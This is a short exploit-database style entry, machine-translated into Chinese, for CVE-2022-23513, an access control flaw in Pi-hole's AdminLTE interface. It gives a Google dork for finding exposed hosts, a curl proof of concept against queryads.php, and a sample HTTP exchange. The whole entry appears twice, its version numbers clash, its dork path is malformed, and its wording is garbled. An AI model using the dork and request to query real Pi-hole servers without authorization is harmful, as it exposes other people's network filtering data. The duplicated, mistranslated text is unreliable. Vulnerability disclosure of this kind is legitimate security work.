#利用标题: Adminlte Pihole 5.18-损坏的访问控制
#Google Dork: [inurl:Admin/scripts/pi-hole/phpqueryads.php]
#日期: 21.12.2022
#利用作者: kv1to
#版本: pi-hole v5.14.2; FTL v5.19.2; Web界面v5.17
#测试在: raspbian/debian
#vendor: https://github.com/pi-hole/adminlte/security/advisories/ghsa-6qh8-6rrj-7497
#CVE : CVE-2022-23513
如果发生攻击,威胁行为者将获得对Queryads端点上阻止域的未经授权查询的能力。
## curl:的概念证明
curl'http://pi.hole/admin/scripts/pi-hole/php/queryads.php?domain=searchquery'
## HTTP请求
get/admin/scripts/pi-hole/php/queryads.php?domain=searchQuery'http/1.1
host: pi.hole
cookie: [. snpipped .]
[. Snpipped .]
## HTTP响应
http/1.1 200好
[. Snpipped .]
Data:在[. Snipped .]中发现的匹配
Data:域
Data:域
Data:域
#Google Dork: [inurl:Admin/scripts/pi-hole/phpqueryads.php]
#日期: 21.12.2022
#利用作者: kv1to
#版本: pi-hole v5.14.2; FTL v5.19.2; Web界面v5.17
#测试在: raspbian/debian
#vendor: https://github.com/pi-hole/adminlte/security/advisories/ghsa-6qh8-6rrj-7497
#CVE : CVE-2022-23513
如果发生攻击,威胁行为者将获得对Queryads端点上阻止域的未经授权查询的能力。
## curl:的概念证明
curl'http://pi.hole/admin/scripts/pi-hole/php/queryads.php?domain=searchquery'
## HTTP请求
get/admin/scripts/pi-hole/php/queryads.php?domain=searchQuery'http/1.1
host: pi.hole
cookie: [. snpipped .]
[. Snpipped .]
## HTTP响应
http/1.1 200好
[. Snpipped .]
Data:在[. Snipped .]中发现的匹配
Data:域
Data:域
Data:域